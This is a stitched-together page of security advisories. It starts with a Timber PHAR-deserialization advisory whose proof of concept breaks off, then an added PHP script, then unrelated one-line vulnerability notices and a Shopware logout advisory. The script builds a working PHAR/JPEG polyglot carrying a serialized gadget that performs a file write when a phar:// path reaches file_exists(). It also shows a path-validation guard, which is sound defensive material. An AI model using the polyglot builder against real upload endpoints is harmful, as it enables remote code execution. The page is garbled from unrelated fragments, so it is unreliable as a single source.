Tag
#php
### Summary

Timber is vulnerable to [PHAR deserialization](https://portswigger.net/web-security/deserialization/exploiting#phar-deserialization) because input is passed into `file_exists()` without being checked. If an attacker can upload files of any type to the server, they can pass a `phar://` path to have PHP unserialize the metadata of the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution, especially when Timber is used with frameworks that have documented POP chains (such as WordPress) or alongside vulnerable developer code.

### Details

The vulnerability lies in the run function within the `toJpg.php` file. The two parameters passed into it are not checked or sanitized, so an attacker could inject malicious input leading to Deserialization of Untrusted Data and allowing remote code execution:

![image](https://github.com/timber/timber/assets/89630690/bcd6d031-33c6-4cc5-96b7-b72f0cf0e26c)

### PoC

Set up the following code in `/var/www/html`:

`...
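The mechanism the advisory describes, as an added example that is not Timber's code or the reporter's PoC: a hypothetical gadget class (`LogWriter`), a PHAR whose metadata carries the serialized gadget, the vulnerable pattern of handing an attacker-controlled path to `file_exists()`, and a hardened check (`safeLocalPath`) that rejects stream wrappers and confines the path to an upload directory. File names and directories are made up for the demo. One caveat a practitioner should know: PHP 8.0 stopped unserializing phar metadata automatically during stream-wrapper operations, so the destructor in this demo fires only on PHP 7.x; the guard is worth having on either version.

```php
<?php
// Added example, not Timber's code. Shows why an attacker-controlled path
// reaching file_exists() is a deserialization sink, and a guard for it.
// Run with: php -d phar.readonly=0 phar_sink_demo.php
// (phar.readonly must be off to *build* the archive; reading never needs it.)
// PHP 8.0 no longer unserializes phar metadata on wrapper access, so the
// gadget below only fires on PHP 7.x.

// Hypothetical gadget. In a real chain this is a class that already exists in
// the application or framework; its magic method does the damaging work.
class LogWriter
{
    public $file;
    public $data;

    public function __destruct()
    {
        if ($this->file !== null) {
            file_put_contents($this->file, $this->data); // attacker-chosen write
        }
    }
}

// Attacker side: a PHAR whose manifest metadata is the serialized gadget.
// The stub is prefixed with JPEG magic bytes so the file also passes a naive
// "is this an image?" check at upload time.
function buildPharPayload(string $pharPath, object $gadget): void
{
    @unlink($pharPath);
    $phar = new Phar($pharPath);            // Phar requires a .phar name here
    $phar->startBuffering();
    $phar->addFromString('x.txt', 'x');
    $phar->setStub("\xFF\xD8\xFF\xE0<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata($gadget);            // serialized into the manifest
    $phar->stopBuffering();
}

// Vulnerable pattern: the path goes straight to a filesystem function.
// With a phar:// path, PHP opens the archive, parses the manifest and
// (PHP 7.x) unserializes the metadata, instantiating the gadget.
function vulnerableRun(string $src): bool
{
    return file_exists($src);
}

// Hardened form: reject NUL bytes and any URL scheme, then confine the
// resolved path to the allowed base directory.
function safeLocalPath(string $path, string $baseDir): ?string
{
    if (strpos($path, "\0") !== false) {
        return null;
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path)) {
        return null;                        // phar://, php://, data://, ...
    }
    $real = realpath($path);                // false for wrappers and missing files
    $base = realpath(rtrim($baseDir, DIRECTORY_SEPARATOR));
    if ($real === false || $base === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;                        // escaped the upload directory
    }
    return $real;
}

// Demo (constructed paths; nothing here touches a real web root)
$dir = sys_get_temp_dir() . '/phar-sink-demo';
@mkdir($dir, 0700, true);

$gadget = new LogWriter();
$gadget->file = "$dir/gadget-ran.txt";
$gadget->data = "destructor executed via phar metadata\n";
buildPharPayload("$dir/payload.phar", $gadget);
$gadget->file = null;                       // disarm the local copy

// "Uploaded" under an innocent name; the phar:// wrapper ignores the extension.
rename("$dir/payload.phar", "$dir/avatar.jpg");
$malicious = "phar://$dir/avatar.jpg/x.txt";

vulnerableRun($malicious);
echo file_exists("$dir/gadget-ran.txt")
    ? "gadget fired\n"
    : "gadget did not fire (PHP >= 8.0)\n";

var_dump(safeLocalPath($malicious, $dir));           // NULL: wrapper rejected
var_dump(safeLocalPath("$dir/avatar.jpg", $dir));    // string: plain local file
var_dump(safeLocalPath("$dir/../avatar.jpg", $dir)); // NULL: traversal rejected
```

If the code legitimately needs to fetch remote images, do not loosen the scheme check to "anything with `://`"; allowlist `http://` and `https://` explicitly and keep everything else, `phar://` included, rejected. The `realpath()` step is defense in depth: it returns `false` for wrapper paths anyway, and it also stops `../` escapes from the upload directory.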
WordPress Playlist for Youtube plugin version 1.32 suffers from a persistent cross site scripting vulnerability.
GUnet OpenEclass E-learning platform version 3.15 suffers from an unrestricted file upload vulnerability in certbadge.php that allows for remote command execution.
Joomla SP Page Builder component version 5.2.7 suffers from a remote SQL injection vulnerability.
By Owais Sultan. WordPress, a widely used content management system, owes a great deal of its flexibility to plugins. These small… This is a post from HackRead.com. Read the original post: The Essential Tools and Plugins for WordPress Development
Flightio.com suffers from a remote SQL injection vulnerability. The researchers reporting this claimed the site has not responded to their reports so we are posting this to add visibility to the issue.
WordPress Travelscape theme version 1.0.3 suffers from an arbitrary file upload vulnerability.
Daily Expense Manager version 1.0 suffers from a remote SQL injection vulnerability.
### Impact

When an authenticated request is made to `POST /store-api/account/logout`, the cart is cleared but the user is not logged out. This affects only direct store-api usage: the PHP Storefront additionally listens on `CustomerLogoutEvent` and invalidates the session itself.

### Patches

The problem has been fixed in Shopware 6.6.1.0 and 6.5.8.8.

### Workarounds

If you are not able to update, you can install the latest version of the Shopware Security Plugin.
Invision Community versions 4.7.16 and below suffer from a remote code execution vulnerability in toolbar.php.